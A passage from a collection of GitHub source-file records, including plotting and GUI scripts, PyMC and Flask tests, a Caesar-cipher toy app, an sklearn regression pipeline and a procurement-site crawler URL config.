2.069, 2.227, 2.335, 2.997]\n color_list = ['grey', 'deeppink', 'blue', 'forestgreen', 'darkorange',\n 'cyan','deepskyblue', 'darkcyan', 'darkcyan', 'red']\n index = np.arange(len(name_list))\n bar_width = 0.25\n fig, ax = plt.subplots(figsize=(20, 12))\n plt.bar(index, num_list_aids, width=bar_width, align=\"center\",\n color='white', label='AIDS', edgecolor='k', hatch=\"///\", lw=3)\n # for a, b in zip(name_list, num_list_aids):\n # plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=25)\n\n plt.bar(index + bar_width, num_list_linux, width=bar_width, align=\"center\",\n color='white', label='LINUX', edgecolor='k', hatch=\"\\\\\\\\\", lw=3)\n # for a, b in zip(name_list, num_list_linux):\n # plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=25)\n\n plt.bar(index + 2 * bar_width, num_list_imdb, width=bar_width, align=\"center\",\n color='white', label='IMDB', edgecolor='k', hatch='', lw=3)\n # for a, b in zip(name_list, num_list_imdb):\n # if b != 0:\n # plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=25)\n plt.xticks(index + 0.25, ('A*', 'Beam', 'Hung\\narian', 'VJ', 'Simple\\nMean',\n 'Hierar\\nchical\\nMean', 'Hierar\\nchical\\nMax', 'Att\\nDegree',\n 'Att\\nGlobal\\nContext', 'Att\\nLearn-\\nableGC', 'SimGNN'), fontsize=28)\n plt.yticks(fontsize=30)\n plt.ylabel(\"time(msec)\", font2)\n plt.yscale(\"log\")\n plt.legend(loc='best', prop={'size': 30})\n plt.grid(which=u'major', axis=u'y', linestyle='--')\n plt.tight_layout()\n plt.savefig(\"time.png\")\n plt.savefig(\"time.eps\")\n plt.close()\n # plt.show()\n\n\n\n\n\n\n","repo_name":"yunshengb/SimGNN","sub_path":"src/data_pre_post_process/time_hist_three.py","file_name":"time_hist_three.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"67"} +{"seq_id":"73941163733","text":"\nfrom tkinter import*\n\nclass main:\n def __init__(self, master):\n #Local Variables\n terrainx=0\n terrainy=screenh/1.5\n terrainx1=app.winfo_screenwidth()\n terrainy2=app.winfo_screenheight()\n self.gravity=10\n #Drawings\n self.canvas=Canvas(width=screenw, height=screenh)\n self.canvas.pack()\n \n self.player=self.canvas.create_rectangle(5,5,20,50,fill=\"green\")\n self.monster=self.canvas.create_rectangle(405,5,420,50,fill=\"red\")\n self.terrain=self.canvas.create_rectangle(terrainx,terrainy,terrainx1,terrainy2,fill=\"black\")\n self.plataform=self.canvas.create_rectangle(terrainx+200,terrainy-30,terrainx+250,terrainy-20,fill=\"black\")\n self.plataform_1=self.canvas.create_rectangle(terrainx+300,terrainy-50,terrainx+350,terrainy-40,fill=\"black\")\n\n self.update_player()\n \n \n def update_player(self):\n #Boundaries to make collision based on border of the drawnings\n self.player_bbox=self.canvas.bbox(self.player)\n self.terrain_bbox=self.canvas.bbox(self.terrain)\n self.plataform_bbox=self.canvas.bbox(self.plataform)\n self.plataform_1_bbox=self.canvas.bbox(self.plataform_1)\n #Gravity and velocity control\n velocity=0\n velocity += self.gravity\n \n #Method to stop player if the down border of player encounter top border of terrain\n if self.player_bbox[3] >= self.terrain_bbox[1]:\n velocity=0\n \n elif self.player_bbox[3] >= self.plataform_bbox[1]:\n if self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] :\n velocity=0\n \n elif self.player_bbox[3] >= self.plataform_1_bbox[1]:\n if self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2] :\n velocity=0\n \n #Move the player based on gravity to make player come back to plataform\n self.canvas.move(self.player, 0, velocity)\n \n #Keep calling the update_player Function to make things *WORK*\n self.canvas.after(100, self.update_player)\n\n #Method to move player as the correspondent key is pressed\n def move_player(self, event):\n\n key = event.keysym\n #Move to left\n if key == \"Left\":\n #\"Trying\" to delimitate the extent it can move, in this case, the border of screen\n if self.player_bbox[0] >= 15:\n if self.player_bbox[3] >= self.terrain_bbox[1] or self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] or self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2]:\n self.canvas.move(self.player, -5,0)\n print(\"Left\")\n app.update()\n else:\n print(\"Cant Move\")\n #Move Up(Aka:Jump)\n if key == \"Up\":\n #Only allow \"jumping\" if the\n if self.player_bbox[3] >= self.terrain_bbox[1] or self.player_bbox[3] >= self.plataform_bbox[1] and self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] or self.player_bbox[3] >= self.plataform_1_bbox[1] and self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2]:\n self.canvas.move(self.player, 0,-50)\n print(\"Up\")\n self.canvas.after(150)\n else:\n print(\"Cant Move\")\n\n #Move Right\n elif key == \"Right\":\n #\"Trying\" to delimitate the extent it can move, in this case, the border of screen\n if self.player_bbox[2] <= screenw-15:\n if self.player_bbox[3] >= self.terrain_bbox[1] or self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] or self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2]:\n self.canvas.move(self.player, 5,0)\n print(\"Right\")\n app.update()\n else:\n print(\"Cant Move\")\n \n\n#Main Program\napp=Tk()\n\n#Global Variables\nscreenw=app.winfo_screenwidth()/2\nscreenh=app.winfo_screenheight()/2\n\n#Screen Settings\napp.geometry(\"%dx%d+%d+%d\"%(screenw,screenh,screenw/2,screenh/2))\napp.resizable(0,0)\n\n#Call-out\nroot=main(app)\n\nroot.canvas.bind_all(\"\",root.move_player)\n\n\n\n\n\n#Main Loop\napp.mainloop()\n","repo_name":"gbyuri/Project-RPG-Python","sub_path":"moretesting.py","file_name":"moretesting.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16748832084","text":"import jax\nimport numpy as np\nimport pymc as pm\nimport pytensor.tensor as pt\nimport pytest\nimport scipy\nfrom numpy import dtype\nfrom xarray.core.utils import Frozen\n\nfrom pymc_experimental.inference.smc.sampling import (\n arviz_from_particles,\n blackjax_particles_from_pymc_population,\n get_jaxified_loglikelihood,\n get_jaxified_logprior,\n sample_smc_blackjax,\n)\n\n\ndef two_gaussians_model():\n n = 4\n mu1 = np.ones(n) * 0.5\n mu2 = -mu1\n\n stdev = 0.1\n sigma = np.power(stdev, 2) * np.eye(n)\n isigma = np.linalg.inv(sigma)\n dsigma = np.linalg.det(sigma)\n\n w1 = stdev\n w2 = 1 - stdev\n\n def two_gaussians(x):\n \"\"\"\n Mixture of gaussians likelihood\n \"\"\"\n log_like1 = (\n -0.5 * n * pt.log(2 * np.pi)\n - 0.5 * pt.log(dsigma)\n - 0.5 * (x - mu1).T.dot(isigma).dot(x - mu1)\n )\n log_like2 = (\n -0.5 * n * pt.log(2 * np.pi)\n - 0.5 * pt.log(dsigma)\n - 0.5 * (x - mu2).T.dot(isigma).dot(x - mu2)\n )\n return pt.log(w1 * pt.exp(log_like1) + w2 * pt.exp(log_like2))\n\n with pm.Model() as m:\n X = pm.Uniform(\"X\", lower=-2, upper=2.0, shape=n)\n llk = pm.Potential(\"muh\", two_gaussians(X))\n\n return m, mu1\n\n\ndef fast_model():\n with pm.Model() as m:\n x = pm.Normal(\"x\", 0, 1)\n y = pm.Normal(\"y\", x, 1, observed=0)\n return m\n\n\n@pytest.mark.parametrize(\n \"kernel, check_for_integration_steps, inner_kernel_params\",\n [\n (\"HMC\", True, {\"step_size\": 0.1, \"integration_steps\": 11}),\n (\"NUTS\", False, {\"step_size\": 0.1}),\n ],\n)\ndef test_sample_smc_blackjax(kernel, check_for_integration_steps, inner_kernel_params):\n \"\"\"\n When running the two gaussians model\n with BlackJax SMC, we sample them correctly,\n the shape of a posterior variable is (1, particles, dimension)\n and the inference_data has the right attributes.\n\n \"\"\"\n model, muref = two_gaussians_model()\n iterations_to_diagnose = 2\n n_particles = 1000\n with model:\n inference_data = sample_smc_blackjax(\n n_particles=n_particles,\n kernel=kernel,\n inner_kernel_params=inner_kernel_params,\n iterations_to_diagnose=iterations_to_diagnose,\n )\n\n x = inference_data.posterior[\"X\"]\n\n assert x.to_numpy().shape == (1, n_particles, 4)\n mu1d = np.abs(x).mean(axis=0).mean(axis=0)\n np.testing.assert_allclose(muref, mu1d, rtol=0.0, atol=0.03)\n\n for attribute, value in [\n (\"particles\", n_particles),\n (\"step_size\", 0.1),\n (\"num_mcmc_steps\", 10),\n (\"iterations_to_diagnose\", iterations_to_diagnose),\n (\"sampler\", f\"Blackjax SMC with {kernel} kernel\"),\n ]:\n assert inference_data.posterior.attrs[attribute] == value\n\n for diagnostic in [\"lambda_evolution\", \"log_likelihood_increments\"]:\n assert inference_data.posterior.attrs[diagnostic].shape == (iterations_to_diagnose,)\n\n for diagnostic in [\"ancestors_evolution\", \"weights_evolution\"]:\n assert inference_data.posterior.attrs[diagnostic].shape == (\n iterations_to_diagnose,\n n_particles,\n )\n\n for attribute in [\"running_time_seconds\", \"iterations\"]:\n assert attribute in inference_data.posterior.attrs\n\n if check_for_integration_steps:\n assert inference_data.posterior.attrs[\"integration_steps\"] == 11\n\n\ndef test_blackjax_particles_from_pymc_population_univariate():\n model = fast_model()\n population = {\"x\": np.array([2, 3, 4])}\n blackjax_particles = blackjax_particles_from_pymc_population(model, population)\n jax.tree_map(np.testing.assert_allclose, blackjax_particles, [np.array([[2], [3], [4]])])\n\n\ndef test_blackjax_particles_from_pymc_population_multivariate():\n with pm.Model() as model:\n x = pm.Normal(\"x\", 0, 1)\n z = pm.Normal(\"z\", 0, 1)\n y = pm.Normal(\"y\", x + z, 1, observed=0)\n\n population = {\"x\": np.array([0.34614613, 1.09163261, -0.44526825]), \"z\": np.array([1, 2, 3])}\n blackjax_particles = blackjax_particles_from_pymc_population(model, population)\n jax.tree_map(\n np.testing.assert_allclose,\n blackjax_particles,\n [np.array([[0.34614613], [1.09163261], [-0.44526825]]), np.array([[1], [2], [3]])],\n )\n\n\ndef simple_multivariable_model():\n \"\"\"\n A simple model that has a multivariate variable,\n a has more than one variable (multivariable)\n \"\"\"\n with pm.Model() as model:\n x = pm.Normal(\"x\", 0, 1, shape=2)\n z = pm.Normal(\"z\", 0, 1)\n y = pm.Normal(\"y\", z, 1, observed=0)\n return model\n\n\ndef test_blackjax_particles_from_pymc_population_multivariable():\n model = simple_multivariable_model()\n population = {\"x\": np.array([[2, 3], [5, 6], [7, 9]]), \"z\": np.array([11, 12, 13])}\n blackjax_particles = blackjax_particles_from_pymc_population(model, population)\n\n jax.tree_map(\n np.testing.assert_allclose,\n blackjax_particles,\n [np.array([[2, 3], [5, 6], [7, 9]]), np.array([[11], [12], [13]])],\n )\n\n\ndef test_arviz_from_particles():\n model = simple_multivariable_model()\n particles = [np.array([[2, 3], [5, 6], [7, 9]]), np.array([[11], [12], [13]])]\n with model:\n inference_data = arviz_from_particles(model, particles)\n\n assert inference_data.posterior.dims == Frozen({\"chain\": 1, \"draw\": 3, \"x_dim_0\": 2})\n assert inference_data.posterior.data_vars.dtypes == Frozen(\n {\"x\": dtype(\"float64\"), \"z\": dtype(\"float64\")}\n )\n\n\ndef test_get_jaxified_logprior():\n \"\"\"\n Given a model with a Normal prior\n for a RV, the jaxified logprior\n indeed calculates that number,\n and can be jax.vmap'ed\n \"\"\"\n logprior = get_jaxified_logprior(fast_model())\n for point in [-0.5, 0.0, 0.5]:\n jax.tree_map(\n np.testing.assert_allclose,\n jax.vmap(logprior)([np.array([point])]),\n np.log(scipy.stats.norm(0, 1).pdf(point)),\n )\n\n\ndef test_get_jaxified_loglikelihood():\n \"\"\"\n Given a model with a Normal Likelihood, a single observation\n 0 and std=1, the only free parameter of that function is the mean.\n When computing the logliklikelihood\n Then the function can be jax.vmap'ed, and the calculation matches the likelihood.\n \"\"\"\n loglikelihood = get_jaxified_loglikelihood(fast_model())\n for point in [-0.5, 0.0, 0.5]:\n jax.tree_map(\n np.testing.assert_allclose,\n jax.vmap(loglikelihood)([np.array([point])]),\n np.log(scipy.stats.norm(point, 1).pdf(0)),\n )\n","repo_name":"pymc-devs/pymc-experimental","sub_path":"pymc_experimental/tests/test_blackjax_smc.py","file_name":"test_blackjax_smc.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"67"} +{"seq_id":"11708425752","text":"from rest_framework import serializers\n\nfrom api_orders.models import OrderItem\nfrom api_products.serializers import ProductSerializer\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = OrderItem\n fields = ['product', 'quantity', 'price']\n\n\nclass MyOrderItemSerializer(serializers.ModelSerializer):\n product = ProductSerializer()\n\n class Meta:\n model = OrderItem\n fields = ['product', 'quantity', 'price']\n","repo_name":"KhungLongCon12/KLC_Shop","sub_path":"BackEnd/api_orders/serializers/OrderProduct.py","file_name":"OrderProduct.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11803692100","text":"from keras.models import load_model # TensorFlow is required for Keras to work\nimport cv2 # Install opencv-python\nimport numpy as np\nimport serial\nimport serial\nimport time\n\n# Disable scientific notation for clarity\nnp.set_printoptions(suppress=True)\n\n# Load the model\nmodel = load_model(\"keras_model.h5\", compile=False)\n\n# Load the labels\nclass_names = open(\"labels.txt\", \"r\").readlines()\n\n# CAMERA can be 0 or 1 based on default camera of your computer\ncamera = cv2.VideoCapture(0)\n\nser = serial.Serial(\"/dev/ttyUSB0\", 9600)\ntime.sleep(3)\n\nbuf = \"\"\n\nscore = 0\n\nactive = False\nwhile True:\n if ser.in_waiting:\n char = ser.read(1)\n print(char)\n if char == b\"b\":\n active = True\n ser.readline()\n elif char == b\"q\":\n active = False\n ser.readline()\n time.sleep(5)\n else:\n score = int((char + ser.readline()).decode(\"utf-8\"))\n \n # Grab the webcamera's image.\n ret, image = camera.read()\n\n # Resize the raw image into (224-height,224-width) pixels\n image = cv2.resize(image, (224, 224), interpolation=cv2.INTER_AREA)\n\n imgwtext = cv2.putText(image, f\"{score}\", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 5)\n\n # Show the image in a window\n cv2.imshow(\"Webcam Image\", imgwtext)\n\n # Make the image a numpy array and reshape it to the models input shape.\n image = np.asarray(image, dtype=np.float32).reshape(1, 224, 224, 3)\n\n # Normalize the image array\n image = (image / 127.5) - 1\n\n # Predicts the model\n prediction = model.predict(image)\n index = np.argmax(prediction)\n class_name = class_names[index]\n confidence_score = prediction[0][index]\n\n # Print prediction and confidence score\n # print(\"Class:\", class_name[2:], end=\"\")\n # print(\"Confidence Score:\", str(np.round(confidence_score * 100))[:-2], \"%\")\n if class_name == \"0 Class 1\\n\" and not active:\n print(\"asdf\")\n ser.write(b\"a\\n\")\n\n # Listen to the keyboard for presses.\n keyboard_input = cv2.waitKey(1)\n\n # 27 is the ASCII for the esc key on your keyboard.\n if keyboard_input == 27:\n break\n\ncamera.release()\ncv2.destroyAllWindows()\n\nser.close()\n","repo_name":"hyc3573/swchk","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25039172596","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n\n\nclass GaussianDiag:\n Log2PI = float(np.log(2 * np.pi))\n\n @staticmethod\n def likelihood(mean, logs, x):\n \"\"\"\n lnL = -1/2 * { ln|Var| + ((X - Mu)^T)(Var^-1)(X - Mu) + kln(2*PI) }\n k = 1 (Independent)\n Var = logs ** 2\n \"\"\"\n if mean is None and logs is None:\n return -0.5 * (x ** 2 + GaussianDiag.Log2PI)\n else:\n return -0.5 * (logs * 2. + ((x - mean) ** 2) / torch.exp(logs * 2.) + GaussianDiag.Log2PI)\n\n @staticmethod\n def logp(mean, logs, x):\n likelihood = GaussianDiag.likelihood(mean, logs, x)\n return likelihood.view(likelihood.size(0), -1).sum(dim=-1)\n\n @staticmethod\n def sample(mean, logs, eps_std=None):\n eps_std = eps_std or 1\n eps = torch.normal(mean=torch.zeros_like(mean), std=torch.ones_like(logs) * eps_std)\n return mean + torch.exp(logs) * eps\n\n @staticmethod\n def sample_eps(shape, eps_std=0.7, seed=None):\n if seed is not None:\n torch.manual_seed(seed)\n eps = torch.normal(mean=torch.zeros(shape), std=torch.ones(shape) * eps_std)\n return eps","repo_name":"branchCode/FlowFill","sub_path":"s1/codes/models/modules/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72918249172","text":"from tkinter import *\nfrom tkinter import ttk\n\nimport descripta\nimport encripta\n\nroot = Tk()\nroot.title(\"Crypto descktop n2\")\nroot.geometry(\"600x100\")\n\nfrm = ttk.Frame(root, padding=5)\nfrm.grid(row=10, column=1)\n\n\ndef encryptMessage():\n texto = encriptar_input.get()\n\n print(\"TESTE: \", texto)\n\n ct = encripta.encriptar_cesar(texto, 4)\n encriptado_input.insert(0, ct)\n\n\ndef decryptMessage():\n texto_cifrado = descriptar_input.get()\n\n resultado_descript = descripta.decriptar_cesar(texto_cifrado, 4)\n descriptado_input.insert(0, resultado_descript)\n\n\n\nLabel(frm, text='Texto a encriptar: ').grid(row=10, column=1)\nencriptar_input = Entry(root)\nencriptar_input.grid(row=10, column=2)\n\nLabel(root, text='Texto encriptado: ').grid(row=11, column=1)\nencriptado_input = Entry(root)\nencriptado_input.grid(row=11, column=2)\n\nencriptar_botao = Button(root, text = \"Encriptar\", bg =\"red\", fg =\"white\", command=encryptMessage)\nencriptar_botao.grid(row=13, column=2)\n\n\nLabel(root, text='Texto cifrado: ').grid(row=10, column=10)\ndescriptar_input = Entry(root)\ndescriptar_input.grid(row=10, column=11)\n\n\nLabel(root, text='Texto descriptado: ').grid(row=11, column=10)\ndescriptado_input = Entry(root)\ndescriptado_input.grid(row=11, column=11)\n\ndescriptar_botao = Button(root, text = \"Descriptar\", bg =\"green\", fg =\"white\", command=decryptMessage)\ndescriptar_botao.grid(row=13, column=11)\n\n\nroot.mainloop()\n","repo_name":"danielsimonebeira/crypto-desktop","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35961121436","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures \r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.feature_selection import VarianceThreshold\r\nfrom sklearn.linear_model import Lasso, Ridge\r\nfrom sklearn.impute import KNNImputer\r\nfrom sklearn.ensemble import GradientBoostingRegressor, IsolationForest, RandomForestRegressor\r\nfrom sklearn.linear_model import ElasticNetCV\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.experimental import enable_iterative_imputer\r\nfrom sklearn.impute import IterativeImputer\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.decomposition import PCA\r\nimport pandas as pd\r\nimport sklearn\r\n\r\n#load the dataset\r\nX_train = pd.read_csv('X_train.csv').drop(['id'], axis=1)\r\ny_train = pd.read_csv('y_train.csv')[\"y\"]\r\nX_test = pd.read_csv('X_test.csv').drop(['id'], axis=1)\r\n#ds1d = X_train.describe()\r\n#Use IQR to detect the outliers \r\n\r\n#drop the useless featrues\r\nsel=VarianceThreshold()\r\nX_train = sel.fit_transform(X_train)\r\nX_test = sel.transform(X_test)\r\n\r\n\r\n\r\n#imputation of the missing value(KNN imputer)\r\nimp = KNNImputer(n_neighbors=5)\r\nX_train_imputed = imp.fit_transform(X_train)\r\nX_test_imputed = imp.fit_transform(X_test)\r\n\r\n# standardization\r\nscaler = StandardScaler()\r\nX_train_st = scaler.fit_transform(X_train_imputed)\r\nX_test_st = scaler.transform(X_test_imputed)\r\n\r\n## for feature selection \r\nbest_alpha = 0.388\r\nclf = Lasso(alpha=best_alpha)\r\nclf.fit(X_train_st,y_train)\r\nweights = clf.coef_\r\nimportant_features = []\r\nfor i in range(len(weights)):\r\n if weights[i] != 0:\r\n important_features.append(i)\r\nprint(\"Number of important features for our model:\", len(important_features))\r\nprint(\"Indexes of important features for our model:\", important_features)\r\n\r\n#load the dataset again\r\nX_train = pd.read_csv('X_train.csv').drop(['id'], axis=1)\r\ny_train = pd.read_csv('y_train.csv')[\"y\"]\r\nX_test = pd.read_csv('X_test.csv').drop(['id'], axis=1)\r\n\r\n#drop the useless featrues\r\nsel=VarianceThreshold()\r\nX_train = sel.fit_transform(X_train)\r\nX_test = sel.transform(X_test)\r\nX_train = X_train[:,important_features]\r\nX_test = X_test[:,important_features]\r\n \r\n\r\n#imputation of the missing value(iterative)\r\nimp = KNNImputer(n_neighbors=5)\r\nX_train_imputed = imp.fit_transform(X_train)\r\nX_test_imputed = imp.fit_transform(X_test)\r\n\r\n#isolisation forest\r\nclf = IsolationForest(contamination=0.03)\r\npred = clf.fit_predict(X_train_imputed)\r\nindex_outliers = []\r\nfor i in range(len(pred)):\r\n if pred[i] == -1:\r\n index_outliers.append(i)\r\nX_train_imputed = np.delete(X_train_imputed, index_outliers, axis=0)\r\n\r\ny_train = np.delete(y_train.values, index_outliers, axis=0)\r\n\r\n\r\n#outliers\r\nds_train = pd.DataFrame(X_train).describe()\r\nds_test = pd.DataFrame(X_test).describe()\r\nX_train = pd.DataFrame(X_train)\r\nX_test = pd.DataFrame(X_test)\r\nfor index, row in ds_train.iteritems():\r\n index_outliers = []\r\n IQR = row[\"75%\"] - row[\"25%\"]\r\n lower_limit = row[\"25%\"] - 1.5*IQR\r\n upper_limit = row[\"75%\"] + 1.5*IQR\r\n X_train[index][(X_train[index]<=lower_limit) | (X_train[index]>=upper_limit)] = X_train[index].median()\r\nfor index, row in ds_test.iteritems():\r\n index_outliers = []\r\n IQR = row[\"75%\"] - row[\"25%\"]\r\n lower_limit = row[\"25%\"] - 1.5*IQR\r\n upper_limit = row[\"75%\"] + 1.5*IQR\r\n X_test[index][(X_test[index]<=lower_limit) | (X_test[index]>=upper_limit)] = X_test[index].median()\r\n\r\n# standardization\r\nscaler = StandardScaler()\r\nX_train_st = scaler.fit_transform(X_train_imputed)\r\nX_test_st = scaler.transform(X_test_imputed)\r\n\r\n#score test(Gradient Boosting Regressor)\r\nregressor = RandomForestRegressor()\r\nscores = cross_val_score(regressor, X_train_st, y_train, cv=5, scoring= 'r2')\r\nprint(scores.mean(),scores.std())\r\n\r\nregressor.fit(X_train_st, y_train)\r\ny_pred = regressor.predict(X_test_st)\r\n\r\ny_pred = pd.DataFrame(y_pred)\r\ny_pred.to_csv(\"y_predict.csv\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Yinghzzz/document","sub_path":"Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41116638246","text":"\n#政府采购\nCRAWL_GUOJIAGAOXINQU_TASKS = {\n 'name':'guojiagaoxinqu',\n 'source_url':'',\n 'task_queue':'wangban:guojiagaoxinqu:an_work_urls',\n 'task_check':'wangban:guojiagaoxinqu:an_url_check',\n 'task_ajax':'wangban:guojiagaoxinqu:an_url_ajax',\n 'html_type':'static',\n 'tasks':[\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"工程建设\",\n \"an_type\": \"资格预审结果公示\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gxzgysgs/index.jhtml?areaCode=330231\"\n },\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"工程建设\",\n \"an_type\": \"中标候选人公示\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszbhxrgs/index.jhtml?areaCode=330231\"\n },\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"工程建设\",\n \"an_type\": \"招标公告\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszbgg/index.jhtml?areaCode=330231\"\n },\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"工程建设\",\n \"an_type\": \"中标结果公示\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszbjggs/index.jhtml?areaCode=330231\"\n },\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"工程建设\",\n \"an_type\": \"资格预审公告\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszgysgg/index.jhtml?areaCode=330231\"\n },\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"其他交易\",\n \"an_type\": \"成交结果公示\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gxcjjggs/index.jhtml?areaCode=330231\"\n },\n {\n \"an_sub\": \"NONE\",\n \"an_major\": \"其他交易\",\n \"an_type\": \"招标公告\",\n \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/qtjyzbgg/index.jhtml?areaCode=330231\"\n }\n]\n}\n#国家高新区\n\n\ndef main():\n return CRAWL_GUOJIAGAOXINQU_TASKS","repo_name":"nightqiuhua/bigCrawlers","sub_path":"wangban/wangban/work_urls/ningbo/guojiagaoxinqu.py","file_name":"guojiagaoxinqu.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33518765453","text":"from flask import url_for\nfrom lib.tests import assert_status_with_message, ViewTestMixin\nfrom application.blueprints.users.models import User\n\n\n\nclass TestPosts(ViewTestMixin):\n def test_post_page(self,client):\n \"\"\"Post page should respond with a 200\"\"\"\n response = client.get(url_for('mypost.post'))\n assert response.status_code == 200\n\n def test_post_update_page(self,client):\n \"\"\"Post update page should respond with a 200\"\"\"\n response = client.get(url_for('mypost.update'))\n assert response.status_code == 200\n\n def test_post_delete_page(self,client):\n \"\"\"Post delete route should respond with a 200\"\"\"\n response = client.get(url_for('mypost.delete'))\n assert response.status_code == 200\n \n def test_post_form(self,client):\n \"\"\"Post form should redirect with a message\"\"\"\n form = {\n 'body':'Testing post form'\n }\n response = client.post(url_for('mypost.post'), data=form,\n follow_redirects=True)\n assert response.status_code == 200\n\n \n def test_post_update_form(self,client):\n \"\"\"Post update form should redirect with a message\"\"\"\n form = {\n 'body':'Testing post form'\n }\n response = client.post(url_for('mypost.update'), data=form,\n follow_redirects=True)\n assert response.status_code == 200\n","repo_name":"captain204/Socializer","sub_path":"tests/posts/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70106910295","text":"# Imports\nimport pandas as pd\nimport sklearn.metrics\nimport numpy as np\n\n\ndef samplewise_rand_index(y_true_df: pd.DataFrame, y_pred_df: pd.DataFrame) -> float:\n \"\"\"Compute the rand index for each sample in the dataset and then average it\"\"\"\n y_pred_df = y_pred_df.T\n y_true_df = y_true_df.T\n individual_rand_index = []\n for row_index in range(y_true_df.values.shape[0]):\n individual_rand_index.append(sklearn.metrics.adjusted_rand_score(y_true_df.values[row_index].ravel(), y_pred_df.values[row_index].ravel()))\n\n return np.mean(individual_rand_index)\n\n\n\n#The following lines show how the csv files are read\nif __name__ == '__main__':\n CSV_FILE_Y_TRUE = '--------.csv' # path of the y_true csv file\n CSV_FILE_Y_PRED = '--------.csv' # path of the y_pred csv file\n df_y_true = pd.read_csv(CSV_FILE_Y_TRUE, index_col=0, sep=',')\n df_y_pred = pd.read_csv(CSV_FILE_Y_PRED, index_col=0, sep=',')\n df_y_pred = df_y_pred.loc[df_y_true.index]\n print(samplewise_rand_index(df_y_true, df_y_pred))\n","repo_name":"thibautloiseau/mips","sub_path":"examples/samplewise_rand_index_transpose.py","file_name":"samplewise_rand_index_transpose.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71544278614","text":"import copy\n\nimport hypothesis.strategies as st\nimport numpy as np\nfrom hypothesis import given\nfrom strategies import data\n\nimport provenance as p\nimport provenance.artifact_hasher as ah\nfrom provenance.hashing import hash\n\n\n@given(data)\ndef test_shallow_and_deep_copies_hashing(o):\n original_hash = hash(o)\n shallow_copy = copy.copy(o)\n deep_copy = copy.deepcopy(o)\n assert hash(shallow_copy) == original_hash\n assert hash(deep_copy) == original_hash\n\n\n@given(st.data())\ndef test_shared_values_hashing(base_data):\n base_data = base_data.draw(data)\n base_copy = lambda: copy.deepcopy(base_data)\n\n shared_dict = {'a': base_data, 'b': base_data}\n without_sharing_dict = {'a': base_copy(), 'b': base_copy()}\n\n assert hash(shared_dict) == hash(without_sharing_dict)\n\n shared_tuple = (base_data, base_data)\n without_sharing_tuple = (base_copy(), base_copy())\n\n assert hash(shared_tuple) == hash(without_sharing_tuple)\n\n shared_list = [base_data, base_data]\n without_sharing_list = [base_copy(), base_copy()]\n\n assert hash(shared_list) == hash(without_sharing_list)\n\n\ndef test_hash_of_contiguous_array_is_the_same_as_noncontiguous():\n a = np.asarray(np.arange(6000).reshape((1000, 2, 3)), order='F')[:, :1, :]\n b = np.ascontiguousarray(a)\n assert hash(a) == hash(b)\n\n\ndef 